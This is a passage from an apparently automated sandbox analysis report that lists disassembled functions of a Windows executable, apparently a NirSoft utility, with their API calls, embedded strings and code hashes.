                                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                  • API String ID: 667068680-3953557276
                                                                                                                  • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                  • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                  • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                  Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                  • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1700100422-0
                                                                                                                  • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                  • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                  Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 552707033-0
                                                                                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                  Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                  • strchr.MSVCRT ref: 0040C140
                                                                                                                  • strchr.MSVCRT ref: 0040C151
                                                                                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                  • memset.MSVCRT ref: 0040C17A
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                  • String ID: 4$h
                                                                                                                  • API String ID: 4066021378-1856150674
                                                                                                                  • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                  • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                  Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                  • String ID: %%0.%df
                                                                                                                  • API String ID: 3473751417-763548558
                                                                                                                  • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                  • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                  Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                  • GetParent.USER32(?), ref: 00406136
                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                  • String ID: A
                                                                                                                  • API String ID: 2892645895-3554254475
                                                                                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                  Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                  • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                  • memset.MSVCRT ref: 0040DA23
                                                                                                                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                  • String ID: caption
                                                                                                                  • API String ID: 973020956-4135340389
                                                                                                                  • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                  • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                  • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                  • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                  Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                  • API String ID: 1283228442-2366825230
                                                                                                                  • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                  • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                  • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                                                                                  • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                  Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • wcschr.MSVCRT ref: 00413972
                                                                                                                  • wcscpy.MSVCRT ref: 00413982
                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                  • wcscpy.MSVCRT ref: 004139D1
                                                                                                                  • wcscat.MSVCRT ref: 004139DC
                                                                                                                  • memset.MSVCRT ref: 004139B8
                                                                                                                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                  • memset.MSVCRT ref: 00413A00
                                                                                                                  • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                  • wcscat.MSVCRT ref: 00413A27
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                  • String ID: \systemroot
                                                                                                                  • API String ID: 4173585201-1821301763
                                                                                                                  • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                  • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                  • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                                  • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                  Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscpy
                                                                                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                  • API String ID: 1284135714-318151290
                                                                                                                  • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                  • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                  • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                                  • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                  Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                  • String ID: 0$6
                                                                                                                  • API String ID: 4066108131-3849865405
                                                                                                                  • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                  • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                                  • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                  Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004082EF
                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                  • memset.MSVCRT ref: 00408362
                                                                                                                  • memset.MSVCRT ref: 00408377
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ByteCharMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 290601579-0
                                                                                                                  • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                  • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                                                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                  Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memchr.MSVCRT ref: 00444EBF
                                                                                                                  • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                  • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                  • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                  • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                                  • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                                  • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                                  • memset.MSVCRT ref: 0044505E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memchrmemset
                                                                                                                  • String ID: PD$PD
                                                                                                                  • API String ID: 1581201632-2312785699
                                                                                                                  • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                  • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                  • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                                  • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                  Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                  • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                  • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                  • GetParent.USER32(?), ref: 00409FA5
                                                                                                                  • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2163313125-0
                                                                                                                  • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                  • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                  • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                  • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                  Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: free$wcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3592753638-3916222277
                                                                                                                  • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                  • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                  • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                                  • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                  Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040A47B
                                                                                                                  • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                  • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                  • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                  • String ID: %s (%s)$YV@
                                                                                                                  • API String ID: 3979103747-598926743
                                                                                                                  • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                  • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                  • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                                  • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                  Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
